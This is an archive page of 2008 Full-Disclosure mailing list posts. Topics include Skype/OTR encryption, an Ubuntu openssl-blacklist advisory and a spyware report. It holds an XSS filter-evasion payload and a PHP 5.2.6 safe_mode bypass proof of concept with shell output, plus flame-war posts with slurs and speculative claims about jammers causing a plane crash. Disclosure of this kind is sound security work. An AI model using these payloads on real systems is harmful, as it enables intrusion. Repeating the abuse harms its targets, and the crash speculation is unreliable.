Re: [Full-disclosure] Skype chat encryption with OTR
Salut, rawket,

On Thu, 19 Jun 2008 13:00:49 +1000, rawket wrote:
> There is no denying that an OTR Conversation has been encrypted..
> It's because the private keys change ultra-frequently, and the keys
> are short lived that it provides the 'plausible deniability'

Not exactly. The plausible deniability is due to the fact that the signature is executed using a symmetric key known to both parties, so that either party (but no one else) could have sent the message.

Tonnerre

--
SyGroup GmbH                    Tonnerre Lombard
Solutions Systematiques         Tel: +41 61 333 80 33
Güterstrasse 86                 Fax: +41 61 383 14 67
4053 Basel                      Web: www.sygroup.ch
[EMAIL PROTECTED]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
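Tonnerre's point, that a MAC under a key both parties hold is what makes OTR deniable, is easy to see in code. The following is an added example written for this page, not code from the OTR project or from any of the posters; the HMAC-SHA256 construction, the 32-byte keys and the names alice/bob/eve are this example's stand-ins for OTR's per-message MAC and its Diffie-Hellman-derived key.

```python
import hashlib
import hmac
import secrets

# Constructed stand-in for OTR's per-message authentication: a MAC under a key
# that both chat partners derive from their Diffie-Hellman exchange. Names and
# key sizes here are illustrative, not OTR's actual key schedule.


def mac_tag(mac_key: bytes, message: bytes) -> bytes:
    """Authenticate a message with a symmetric key shared by both parties."""
    return hmac.new(mac_key, message, hashlib.sha256).digest()


def verify(mac_key: bytes, message: bytes, tag: bytes) -> bool:
    """Constant-time check that tag is the MAC of message under mac_key."""
    return hmac.compare_digest(mac_tag(mac_key, message), tag)


def who_could_have_made(tag: bytes, message: bytes, holders: dict) -> list:
    """Every party whose key reproduces the tag is a plausible author.

    With a shared MAC key that is always both endpoints, which is exactly why
    a MAC gives deniability where a public-key signature would not: a
    signature verifies under one party's public key alone."""
    return sorted(name for name, key in holders.items() if verify(key, message, tag))


def deniability_demo() -> dict:
    shared_mac_key = secrets.token_bytes(32)   # both ends hold this after the handshake
    outsider_key = secrets.token_bytes(32)     # an eavesdropper only has the transcript

    message = b"let's meet at noon"            # constructed sample message
    tag = mac_tag(shared_mac_key, message)     # Alice sends (message, tag)

    holders = {"alice": shared_mac_key, "bob": shared_mac_key, "eve": outsider_key}
    return {
        "bob_accepts": verify(shared_mac_key, message, tag),
        "plausible_authors": who_could_have_made(tag, message, holders),
        # Bob can also fabricate a transcript line Alice never sent and it
        # verifies identically; nothing in the tag distinguishes the two.
        "bob_can_forge": verify(shared_mac_key, b"forged line",
                                mac_tag(shared_mac_key, b"forged line")),
    }


if __name__ == "__main__":
    print(deniability_demo())
```

Run it and the plausible_authors list always names both endpoints, never the sender alone. OTR goes one step beyond this sketch: once a MAC key is retired it is published in later messages, so that anyone, not just the two parties, could have produced a tag under it.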
Re: [Full-disclosure] Skype chat encryption with OTR
Are you willing to trust Skype encryption for your own confidential material?

It obviously depends on the risk context and trust scenario. I would never send any confidential material over a Skype chat but only over a channel where I have independent control over the information encryption.

It would be nice to analyze some approach to make even the "voice" of Skype end-to-end encrypted with an independent encryption module (applying ZRTP or other crypto technologies), even if this one could be much more difficult to achieve.

Cheers
Fabio/naif

Ureleet wrote:
> isnt skype encrypted anyway?
Re: [Full-disclosure] Skype chat encryption with OTR
Yeah it's encrypted, Public AND Private keys are stored on Skype's server. Although this is great, and provides the user with an encrypted conversation (voice or text) wherever he/she is in the world - it means all the keys are stored in 1 location and can be intercepted by either Skype or the feds heh...

>> end-to-end deniable encryption for Skype chat messages.

There is no denying that an OTR Conversation has been encrypted.. It's because the private keys change ultra-frequently, and the keys are short lived that it provides the 'plausible deniability'

Even with OTR, there's no need to send your private conversations through Skype's servers. You should use OTR with a trusted Jabber server.
Re: [Full-disclosure] xss dot(.) filter evasion
On 18 Jun 08, at 08:49, Thomas Pollet wrote:
> I came across this site that implemented some filtering so the dots were
> replaced by an underscore, also the quotes and backslash were escaped.
> I came up with the code below to bypass this filtering (write anything to
> the page using String.fromCharCode)
> Someone knows a different way to do this?

eval makes everything easy. Well, reasonably easy.

    eval(unescape(String(/%2a%2a%2falert(%22xss%22);%2f%2a%2a/)));
Re: [Full-disclosure] Coming soon : Firefox 3 Release overflow
is this the "lets set a world record for downloads, oh wait, we forgot to buy the bandwidth to support that" overflow?

On Tue, Jun 17, 2008 at 10:20 PM, doulcet pierre <[EMAIL PROTECTED]> wrote:
> CRC32 : 898482c7
> MD5 : 801ed54c2ab948472584154ba5bec56e
> SHA-1 : 595ab2d95a433c8973d60245cb2b4d3857838605
> SHA-2 256 : 0c70374063951c9f7eaf26cfe306c1e9773bbd84cb3a1396b3e0b1d633b4498a
>
> Firefox 3 Release, overflow.
>
> --
> [EMAIL PROTECTED]
> Proof-of-Concept.fr
Re: [Full-disclosure] Skype chat encryption with OTR
isnt skype encrypted anyway?

On Wed, Jun 18, 2008 at 5:11 AM, Fabio Pietrosanti (naif) <[EMAIL PROTECTED]> wrote:
> For all you OS X guys that like Skype because of its usability but are
> concerned about the lack of an end-to-end message encryption system (a
> plug-in for Skype).
>
> Today I tried:
>
> #1 Get and install Adium (I suggest portable Adium in a separate
> FileVault volume)
>    http://www.freesmug.org/portableapps/adium/
>
> #2 Get and install the Skype plug-in for Adium
>    http://myjobspace.co.nz/images/pidgin/
>
> #3 Enable OTR encryption on Skype chat (through the Adium client)
>    http://www.cypherpunks.ca/otr/
>
> Et voilà, end-to-end deniable encryption for Skype chat messages.
>
> The funny thing is that you can see the encrypted chat and key exchange
> in the standard Skype messaging window, so you can verify yourself that
> everything is enciphered.
>
> Now I feel more comfortable and will sleep +10 minutes each night.
>
> Cheers
>
> Fabio/naif
Re: [Full-disclosure] Fwd: Comments on: Internet-connected coffee maker has security holes
i'd love to see n3td3v dos a coffee maker. hell i'd love to see n3td3v dos anything.

On Tue, Jun 17, 2008 at 6:14 PM, T Biehn <[EMAIL PROTECTED]> wrote:
> When no one was looking, you brewed forty pots of coffee. You brewed
> 40 pots of coffee. That's as many as four tens.
> And the Feds know you're terrible.
>
> On Tue, Jun 17, 2008 at 4:31 PM, n3td3v <[EMAIL PROTECTED]> wrote:
>> -- Forwarded message --
>> From: n3td3v <[EMAIL PROTECTED]>
>> Date: Tue, Jun 17, 2008 at 9:27 PM
>> Subject: Comments on: Internet-connected coffee maker has security holes
>> To: n3td3v <[EMAIL PROTECTED]>
>>
>> by n3td3v June 17, 2008 1:22 PM
>>
>> "This is why connecting everything to the internet is a terrible
>> idea." Yeah but the intelligence services love it, they embrace it.
>> The amount of information being collected over the internet by them
>> has reached an all time high, the intelligence services are in their
>> zone with the information collecting capability that's going on. If
>> the government didn't like everything connected to the internet, there
>> would have been a clamp down long ago, in fact the government love the
>> internet and hope everything can be internet connected soon. GCHQ and
>> NSA will need to build bigger data warehouses to store everything, but
>> that's not a drawback for them, it's an investment when you start to see
>> the amount of searchable data being collected about everyone and
>> stored on the intelligence services databases that top spies can
>> access from anywhere in the world just like consumers can with Google
>> search, except the intelligence services searches don't come up with
>> the next train to catch, they come up with the next terrorist to catch
>> instead. All the best, n3td3v
>>
>> http://news.cnet.com/8601-10784_3-9970757.html?communityId=2066&targetCommunityId=2066&messageId=741397#741397
Re: [Full-disclosure] Joel Esler comment on Sans ISC podcast
joel -- i told u not to respond, you didnt listen, damn it.. i dont know how much you know about n3td3v, but he tries to make his own name off of other pplz fame and work. take web application security day. take the day he went off on hd moore. take any day, ever. hes just jumping on your coattails and riding you for all you are worth now. fukin ignore him.

n3td3v -- you fuckin douche, get a job. quit trying to ride joels dick like you tried to ride everyone elses on your little web application day (oh by the way, how did that go for you?), or hd moores dick. you dont work for anyone, you dont know shit, you are plainly ranting about whatever and whoever. find some REAL security issues to talk about, and we will gladly participate with you. mi5 doesnt care. you suck. go hang.

On Wed, Jun 18, 2008 at 4:26 PM, n3td3v <[EMAIL PROTECTED]> wrote:
> On Wed, Jun 18, 2008 at 5:56 PM, Joel Esler <[EMAIL PROTECTED]> wrote:
>> On Jun 18, 2008, at 12:26 PM, n3td3v wrote:
>>
>> Joel Esler said he doesn't switch his phone off on flights and that
>> anyone who is on a plane with him should watch out.
>>
>> First of all, I said "before I got the iPhone with the 'airplane' mode" I'd
>> forget to turn off my phone a lot, I'd throw it in my briefcase when I'd go
>> through security, and forget it's in there. Heck I've seen people actually
>> been able to receive calls on their crackberries while in mid flight. Not
>> that they answered them. But I've seen the phones ring. I have an iPhone
>> now, I place it in airplane mode when I get on a flight.
>
> Why did you tell people to be careful when you're on a flight? Does
> that mean you're planning to fly again with your device turned on and
> that you suspect it will mess with the plane's electronics?
>
>> There are actually studies going on RIGHT NOW to see if phones can be
>> allowed to be used during flights by the FCC/FAA, and in other countries as
>> well.
>
> I hope they consider this incident before making up their mind...
>
> They (experts) suspect a radio frequency messed with the electronics,
> one that was being used by MI5 to block mobile phone signals.
>
> "An official probe into the Heathrow crash has focused on the high-tech
> jamming device which shields Gordon Brown from terrorist attack.
>
> When the Boeing 777 crashed on January 17 it passed just feet above
> the Prime Minister's official car as he was driven to the airport to
> board a flight to Beijing.
>
> Inside the car is a jammer which broadcasts radio signals 100 times
> more powerful than a mobile phone.
>
> The device is designed to block signals which MI5 say terrorists use
> to blow up remote-control bombs."
>
> http://www.sundaymirror.co.uk/news/sunday/2008/04/27/gordon-bown-in-a-jam-98487-20396286/
>
> "WASHINGTON — A total electronics failure reportedly occurred before
> the crash of a British Airways 777 at London's Heathrow Airport on
> Thursday (Jan. 17).
>
> All 136 passengers and 16 crew members escaped from the British
> Airways flight from Beijing. The BBC reported that 13 passengers were
> injured.
>
> An airport worker told the BBC that the pilot of the Boeing 777 lost
> all power, and had to glide the plane to a landing. The plane's
> landing gear collapsed after crash landing.
>
> The BBC said the airport worker was told by the pilot that all
> aircraft electronics had failed and that the crew had no warning of a
> problem. "It just went," the worker was quoted as saying. "It's a
> miracle. The [pilot] deserves a medal as big as a frying pan."
>
> http://www.eetimes.com/news/latest/showArticle.jhtml?articleID=205900406
>
> "Computer glitch: This happened with a Malaysian Airlines 777 and a
> former 777 captain told The Sunday Times that for both engines to fail
> at the same time "it has got to be commanded" - ie, it was computer
> error in controlling the engines. Verdict: possible and many experts'
> prime concern"
>
> http://www.timesonline.co.uk/tol/news/uk/article3216746.ece
>
> "The British Airways plane that crash landed at Heathrow today was a
> Boeing 777 - currently regarded as the safest aeroplane in the world
> by aviation experts.
>
> The plane has only been in use for seven years and is the first
> aircraft of its kind to have been designed by computers and boasts the
> latest "avionic and navigational systems".
>
> The Boeing 777 has a number of variant models - such as the 777-200ER
> and 777-300ER - but all the models being flown around the world
> currently have a clean safety record."
>
> http://www.dailymail.co.uk/news/article-508869/Boeing-777-crash-landed-Heathrow-safest-aeroplanes-world-say-experts.html
>
>> Personally I hope this doesn't go through, as I don't want to be sitting
>> next to some dude during my 100,000+ miles I fly a year to hear yacking the
>> whole flight.
>>
>
> I'd be more concerned about terrorists using the phone to trigger some
> kind of security vulnerability with the plane's electronics than having
> my sleep disturbed by a s
[Full-disclosure] Fwd: fag
what a serious researcher.

-- Forwarded message --
From: n3td3v <[EMAIL PROTECTED]>
Date: Wed, Jun 18, 2008 at 5:48 PM
Subject: fag
To: Ureleet <[EMAIL PROTECTED]>

you're such a wee pubic hair that no one is listening to and who i won't respond to in public mailing lists anymore. your heyday is over cock sucker, you ain't getting anymore public responses from me.

all the best, n3td3v
Re: [Full-disclosure] The Extended HTML Form attack revisited
Hi,

Just thought I'd let you know that Wade Alcorn wrote a similar paper in 2006: http://www.bindshell.net/papers/ipc (using IMAP3 too), but of course things have changed since then (namely this attack not working against Firefox 2 or 3).

Also, there is a complete list of ports that Firefox blocks here: http://www.mozilla.org/projects/netlib/PortBanning.html (which Wade's paper references), and the default protocol handlers which can speak to the blocked ports.

Do you know if there's a list of ports published by Microsoft/Opera/Apple about which ports are blocked in their browsers? If not, would you be able to publish the ports you found blocked in an appendix (I'm sure it wouldn't be too much code to whip up to test it, but if you've already done so then there's no point in duplicating work)?

I also did some digging myself and found that the reason Firefox doesn't render the response as HTML is because it searches for the string "http" (case-insensitive, no quotes) in the first 8 bytes of the response; if you can satisfy that condition somehow then you can still get it to happen, but of course that seems pretty unlikely.

IE also tries to search for a string, in this case "http/" (case-insensitive, no quotes) in the first 1024 bytes, but only so that it can identify http headers, so if you can inject data into the first 1024 bytes of the response you can inject headers to do cache poisoning, etc. (You can probably do header injection against Firefox if you can trigger this, but the problem is of course triggering it on Firefox.)

- kuza55

2008/6/19 Sandro Gauci <[EMAIL PROTECTED]>:
> Hi -
>
> Back in 2002 I had published details of a vulnerability affecting most
> web browsers. It detailed a security flaw that allows attackers to
> abuse non-HTTP protocols to launch Cross Site Scripting attacks even
> when a target web application was not vulnerable to XSS.
>
> Six years later I'm releasing an update to this research in this
> paper. This security vulnerability still affects popular web browsers
> nowadays and the following browsers were tested as vulnerable:
>
> * Internet Explorer 6
> * Internet Explorer 7
> * Internet Explorer 8 (beta 1)
> * Opera 9.27
> * Opera 9.50
> * Safari 1.32
> * Safari 3.1.1
>
> Others have described how to abuse this behavior for purposes other than
> Cross Site Scripting. NGSSoftware previously published a paper called
> "Inter-Protocol Exploitation" which references the original EyeonSecurity
> paper.
>
> Paper at:
> http://resources.enablesecurity.com/resources/the%20extended%20html%20form%20attack%20revisited.pdf
>
> or http://tinyurl.com/5d88ll
>
> --
> Sandro Gauci
> EnableSecurity
> Web: http://enablesecurity.com/
[Full-disclosure] [USN-612-11] openssl-blacklist update
===
Ubuntu Security Notice USN-612-11                        June 18, 2008
openssl-blacklist update
http://www.ubuntu.com/usn/usn-612-1
http://www.ubuntu.com/usn/usn-612-3
http://www.ubuntu.com/usn/usn-612-8
http://www.ubuntu.com/usn/usn-612-9
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.04
Ubuntu 7.10
Ubuntu 8.04 LTS

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.06 LTS:
  openssl-blacklist               0.3.3+0.4-0ubuntu0.6.06.2
  openssl-blacklist-extra         0.3.3+0.4-0ubuntu0.6.06.2

Ubuntu 7.04:
  openssl-blacklist               0.3.3+0.4-0ubuntu0.7.04.2
  openssl-blacklist-extra         0.3.3+0.4-0ubuntu0.7.04.2

Ubuntu 7.10:
  openssl-blacklist               0.3.3+0.4-0ubuntu0.7.10.2
  openssl-blacklist-extra         0.3.3+0.4-0ubuntu0.7.10.2

Ubuntu 8.04 LTS:
  openssl-blacklist               0.3.3+0.4-0ubuntu0.8.04.3
  openssl-blacklist-extra         0.3.3+0.4-0ubuntu0.8.04.3

In general, a standard system upgrade is sufficient to effect the necessary changes.

Details follow:

USN-612-3 addressed a weakness in OpenSSL certificate and key generation and introduced openssl-blacklist to aid in detecting vulnerable certificates and keys. This update adds RSA-4096 blacklists to the openssl-blacklist-extra package and adjusts openssl-vulnkey to properly handle RSA-4096 and higher moduli.

Original advisory details:

 A weakness has been discovered in the random number generator used by OpenSSL on Debian and Ubuntu systems. As a result of this weakness, certain encryption keys are much more common than they should be, such that an attacker could guess the key through a brute-force attack given minimal knowledge of the system. This particularly affects the use of encryption keys in OpenSSH, OpenVPN and SSL certificates.

Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist_0.3.3+0.4-0ubuntu0.6.06.2.dsc
      Size/MD5:      676 ec900c22df66e7da2543082d7123aed7
    http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist_0.3.3+0.4-0ubuntu0.6.06.2.tar.gz
      Size/MD5: 32928890 ff8a69186860a3c9bc78c86b51993154

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist-extra_0.3.3+0.4-0ubuntu0.6.06.2_all.deb
      Size/MD5:  6317974 c71f0e9dfaf87712672fb52acb55db0d
    http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist_0.3.3+0.4-0ubuntu0.6.06.2_all.deb
      Size/MD5:  6333018 e43b4ea20935655041e803064cee6626

Updated packages for Ubuntu 7.04:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist_0.3.3+0.4-0ubuntu0.7.04.2.dsc
      Size/MD5:      812 71e900154130bd20b4401b6ac2653cdc
    http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist_0.3.3+0.4-0ubuntu0.7.04.2.tar.gz
      Size/MD5: 32928996 37d24b96159aca653515a8aa136f31d3

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist-extra_0.3.3+0.4-0ubuntu0.7.04.2_all.deb
      Size/MD5:  6318082 cc4e2c235c71d36653ce1c2ef1b247bc
    http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist_0.3.3+0.4-0ubuntu0.7.04.2_all.deb
      Size/MD5:  6332858 d805a05a0bc674c064256cf26f231881

Updated packages for Ubuntu 7.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist_0.3.3+0.4-0ubuntu0.7.10.2.dsc
      Size/MD5:      812 b62d9f57a2c6f4e3e671a3d9648b1df1
    http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist_0.3.3+0.4-0ubuntu0.7.10.2.tar.gz
      Size/MD5: 32928995 8717c32922e43aaaf7203ccd268b99a8

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist-extra_0.3.3+0.4-0ubuntu0.7.10.2_all.deb
      Size/MD5:  6318232 81e856d987468e3fc3a0d6e7e21bf532
    http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist_0.3.3+0.4-0ubuntu0.7.10.2_all.deb
      Size/MD5:  6332724 84087c5b3d5a05cf55d415adaf6974f1

Updated packages for Ubuntu 8.04 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist_0.3.3+0.4-0ubuntu0.8.04.3.dsc
      Size/MD5:      943 c1d37d2d4a36ba178022fc27ff6a0bdc
    http://security.ubuntu.com/ubuntu/pool/main/o/openssl-blacklist/openssl-blacklist_0.3.3+0.4-0ubuntu0.8.04.3.tar.gz
      Size/MD5: 32929040 376d57551e6859b39c2e795284978233

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/o/open
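What openssl-vulnkey does with these blacklists, and why a missing RSA-4096 list mattered, can be sketched in a few lines. This is an added example written for this page, not the openssl-blacklist package's own code: the fingerprint derivation (SHA-1 over the `Modulus=<HEX>` line as printed by `openssl rsa -noout -modulus`, keeping the last 20 hex digits) is this example's assumption about the package's scheme, and the moduli and blacklist contents are constructed.

```python
import hashlib

# Constructed model of a blacklist lookup in the style of openssl-vulnkey.
# Assumption (not taken from the advisory): the fingerprint is SHA-1 over the
# 'Modulus=<HEX>' line as printed by `openssl rsa -noout -modulus`, keeping the
# last 20 hex digits. The sample moduli and lists below are made up.


def fingerprint(modulus_hex: str) -> str:
    """Assumed fingerprint scheme: last 20 hex digits of SHA-1('Modulus=HEX\\n')."""
    line = "Modulus=" + modulus_hex.upper() + "\n"
    return hashlib.sha1(line.encode("ascii")).hexdigest()[20:]


def modulus_bits(modulus_hex: str) -> int:
    """Key size in bits, used to pick the blacklist for that size."""
    return int(modulus_hex, 16).bit_length()


def is_blacklisted(modulus_hex: str, blacklists: dict):
    """Return True/False when a list exists for this key size, None when it
    does not. The USN-612-11 change is about sizes (RSA-4096 and up) that
    previously had no list: 'no list' must be reported, never read as 'clean'."""
    bits = modulus_bits(modulus_hex)
    if bits not in blacklists:
        return None
    return fingerprint(modulus_hex) in blacklists[bits]


# Constructed sample moduli with the top bit set so the size is unambiguous.
WEAK_2048 = "C" + "3" * 511            # 512 hex digits -> 2048 bits
OTHER_2048 = "D" + "5" * 511
SOME_4096 = "E" + "7" * 1023           # 1024 hex digits -> 4096 bits

# Constructed lists: only a 2048-bit list, as before the update ...
BLACKLISTS_BEFORE = {2048: {fingerprint(WEAK_2048)}}
# ... and a 4096-bit list as well, as after it.
BLACKLISTS_AFTER = {2048: {fingerprint(WEAK_2048)}, 4096: {fingerprint(SOME_4096)}}


if __name__ == "__main__":
    for name, m in (("WEAK_2048", WEAK_2048), ("OTHER_2048", OTHER_2048), ("SOME_4096", SOME_4096)):
        print(name, modulus_bits(m),
              "before:", is_blacklisted(m, BLACKLISTS_BEFORE),
              "after:", is_blacklisted(m, BLACKLISTS_AFTER))
```

The three-valued result is the point worth keeping when writing a checker of this kind: a key whose size has no blacklist is unverified, and a scanner that collapses None into False would have passed every 4096-bit key generated with the broken OpenSSL before this update.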
Re: [Full-disclosure] Joel Esler comment on Sans ISC podcast
On Wed, Jun 18, 2008 at 5:56 PM, Joel Esler <[EMAIL PROTECTED]> wrote:
> On Jun 18, 2008, at 12:26 PM, n3td3v wrote:
>
> Joel Esler said he doesn't switch his phone off on flights and that
> anyone who is on a plane with him should watch out.
>
> First of all, I said "before I got the iPhone with the 'airplane' mode" I'd
> forget to turn off my phone a lot, I'd throw it in my briefcase when I'd go
> through security, and forget it's in there. Heck I've seen people actually
> been able to receive calls on their crackberries while in mid flight. Not
> that they answered them. But I've seen the phones ring. I have an iPhone
> now, I place it in airplane mode when I get on a flight.

Why did you tell people to be careful when you're on a flight? Does that mean you're planning to fly again with your device turned on and that you suspect it will mess with the plane's electronics?

> There are actually studies going on RIGHT NOW to see if phones can be
> allowed to be used during flights by the FCC/FAA, and in other countries as
> well.

I hope they consider this incident before making up their mind...

They (experts) suspect a radio frequency messed with the electronics, one that was being used by MI5 to block mobile phone signals.

"An official probe into the Heathrow crash has focused on the high-tech jamming device which shields Gordon Brown from terrorist attack.

When the Boeing 777 crashed on January 17 it passed just feet above the Prime Minister's official car as he was driven to the airport to board a flight to Beijing.

Inside the car is a jammer which broadcasts radio signals 100 times more powerful than a mobile phone.

The device is designed to block signals which MI5 say terrorists use to blow up remote-control bombs."

http://www.sundaymirror.co.uk/news/sunday/2008/04/27/gordon-bown-in-a-jam-98487-20396286/

"WASHINGTON — A total electronics failure reportedly occurred before the crash of a British Airways 777 at London's Heathrow Airport on Thursday (Jan. 17).

All 136 passengers and 16 crew members escaped from the British Airways flight from Beijing. The BBC reported that 13 passengers were injured.

An airport worker told the BBC that the pilot of the Boeing 777 lost all power, and had to glide the plane to a landing. The plane's landing gear collapsed after crash landing.

The BBC said the airport worker was told by the pilot that all aircraft electronics had failed and that the crew had no warning of a problem. "It just went," the worker was quoted as saying. "It's a miracle. The [pilot] deserves a medal as big as a frying pan."

http://www.eetimes.com/news/latest/showArticle.jhtml?articleID=205900406

"Computer glitch: This happened with a Malaysian Airlines 777 and a former 777 captain told The Sunday Times that for both engines to fail at the same time "it has got to be commanded" - ie, it was computer error in controlling the engines. Verdict: possible and many experts' prime concern"

http://www.timesonline.co.uk/tol/news/uk/article3216746.ece

"The British Airways plane that crash landed at Heathrow today was a Boeing 777 - currently regarded as the safest aeroplane in the world by aviation experts.

The plane has only been in use for seven years and is the first aircraft of its kind to have been designed by computers and boasts the latest "avionic and navigational systems".

The Boeing 777 has a number of variant models - such as the 777-200ER and 777-300ER - but all the models being flown around the world currently have a clean safety record."

http://www.dailymail.co.uk/news/article-508869/Boeing-777-crash-landed-Heathrow-safest-aeroplanes-world-say-experts.html

> Personally I hope this doesn't go through, as I don't want to be sitting
> next to some dude during my 100,000+ miles I fly a year to hear yacking the
> whole flight.

I'd be more concerned about terrorists using the phone to trigger some kind of security vulnerability with the plane's electronics than having my sleep disturbed by a single mom or retired couple muttering away on the phone. I think all gadgets and gizmos should be banned from flights in case of 0-day vulnerabilities that are unknown about and cause a system failure.

> Is this some kind of dry american humour that i'm missing here or is
> that not even funny?
>
> yes, It was a joke. Sorry if it was in bad taste.
>

If it was just a joke in a bar then it might be funny, it was a joke during a Sans internet storm center podcast on a segment about bluetooth vulnerabilities, and you and your co-workers were just laughing and a joking like you were in a bar about leaving your phone on and telling people to be careful if they were on the same flight as you. Even if I overheard you telling that joke in a bar I would probably walk over and question you about it, or possibly just call the police. If you had made the same joke at the airport terminal and an airport official overheard you, in Britain you would have been arrested by anti-terrorism police... I don
[Full-disclosure] spyware in smplayer_portable.exe found in MPUI.2008-06-16.Full-Package.exe ?
hi there lord_mulder,

i wanted to report some spyware-like behavior about smplayer_portable.exe

i have just downloaded MPUI.2008-06-16.Full-Package.exe from http://mulder.dummwiedeutsch.de/home/?page=projects#mplayer and installed it completely - codecs + mplayer + smplayer

on running smplayer_portable.exe it tries to connect to the internet, to this host: rautemusik.g24m.net, without me opening any file like an internet radio station or anything else

is this behavior normal? if yes then please tell me what data rautemusik.g24m.net is gathering from my computer?

please investigate this - perhaps the smplayer_portable.exe that you got is infected with some kind of spyware

can you please tell me where you got your version of smplayer_portable.exe that you included in MPUI.2008-06-16.Full-Package.exe?
[Full-disclosure] PHP 5.2.6 chdir(), ftok() (standard ext) safe_mode bypass
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[PHP 5.2.6 chdir(), ftok() (standard ext) safe_mode bypass]

Author: Maksymilian Arciemowicz (cXIb8O3)
securityreason.com
Date:
- - Written: 10.05.2008
- - Public: 17.06.2008

SecurityReason Research
SecurityAlert Id: 55
CVE: CVE-2008-2666
CWE: CWE-264
SecurityRisk: Medium

Affected Software: PHP 5.2.6
Advisory URL: http://securityreason.com/achievement_securityalert/55
Vendor: http://www.php.net

- --- 0. Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

chdir - Change directory
SYNOPSIS: bool chdir ( string $directory )
http://pl.php.net/manual/en/function.chdir.php

ftok - Convert a pathname and a project identifier to a System V IPC key
SYNOPSIS: int ftok ( string $pathname , string $proj )
http://pl.php.net/manual/en/function.ftok.php

!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX.
SECURITYREASON WILL NOT LIST ALL VULNERABLE FUNCTIONS

- --- 1. chdir(), ftok() (from standard ext) and more safe_mode bypass ---
Let's look at the chdir() function:

- ---
PHP_FUNCTION(chdir)
{
    char *str;
    int ret, str_len;

    if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s", &str, &str_len) == FAILURE) {
        RETURN_FALSE;
    }

    /* safe_mode and open_basedir are checked on the raw argument */
    if ((PG(safe_mode) && !php_checkuid(str, NULL, CHECKUID_CHECK_FILE_AND_DIR)) || php_check_open_basedir(str TSRMLS_CC)) {
        RETURN_FALSE;
    }
    ret = VCWD_CHDIR(str);

    if (ret != 0) {
        php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s (errno %d)", strerror(errno), errno);
        RETURN_FALSE;
    }

    RETURN_TRUE;
}
- ---

str is being checked by safe_mode, for example:

- ---
Warning: chdir(): SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access / owned by uid 0 in /www/mb/mb.php on line 8
- ---

In the current directory, we create a subdirectory named "http:".
=> it is now possible to call chdir("http://../../../../../../") and we end up in /

Why?

TRUE==((PG(safe_mode) && !php_checkuid(str, NULL, CHECKUID_CHECK_FILE_AND_DIR)) || php_check_open_basedir(str TSRMLS_CC))

for str="http://../../../../../../"

safe_mode will ignore all paths with http://

The same situation applies to the ftok() function (and more).

- ---EXAMPLE1---
cxib# cat /www/wufff.php
<?php
echo getcwd()."\n";
chdir("/etc/");
echo getcwd()."\n";
?>
cxib# ls -la /www/wufff.php
- -rw-r--r--  1 www  www  62 Jun 17 17:14 /www/wufff.php
cxib# php /www/wufff.php
/www

Warning: chdir(): SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /etc/ owned by uid 0 in /www/wufff.php on line 3
/www
cxib#
- ---/EXAMPLE1---

- ---EXAMPLE2---
cxib# ls -la /www/wufff.php
- -rw-r--r--  1 www  www  74 Jun 17 17:13 /www/wufff.php
cxib# ls -la /www/http:
total 8
drwxr-xr-x   2 www  www   512 Jun 17 17:12 .
drwxr-xr-x  19 www  www  4608 Jun 17 17:13 ..
cxib# cat /www/wufff.php
<?php
echo getcwd()."\n";
chdir("http://../../etc/");
echo getcwd()."\n";
?>
cxib# php /www/wufff.php
/www
/etc
cxib#
- ---/EXAMPLE2---

!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX.
SECURITYREASON WILL NOT LIST ALL VULNERABLE FUNCTIONS

- --- 2. How to fix ---
Do not use safe_mode as a main safety

- --- 3. Greets ---
sp3x
Infospec
schain
p_e_a
Chujwamwdupe

- --- 4. Contact ---
Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.4 (FreeBSD)

iD8DBQFIWCCbW1OhNJH6DMURAsNnAJsEVuvHigC9EZfcg0hhFtlXJsaCMQCgl0w9
W6fcb5TR6GxN9osji+wQCqM=
=tyyL
-----END PGP SIGNATURE-----
[Full-disclosure] PHP 5.2.6 posix_access() (posix ext) safe_mode bypass
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[PHP 5.2.6 posix_access() (posix ext) safe_mode bypass]

Author: Maksymilian Arciemowicz (cXIb8O3)
SecurityReason.com
Date:
- Written: 10.05.2008
- Public: 17.06.2008
SecurityReason Research
SecurityAlert Id: 54
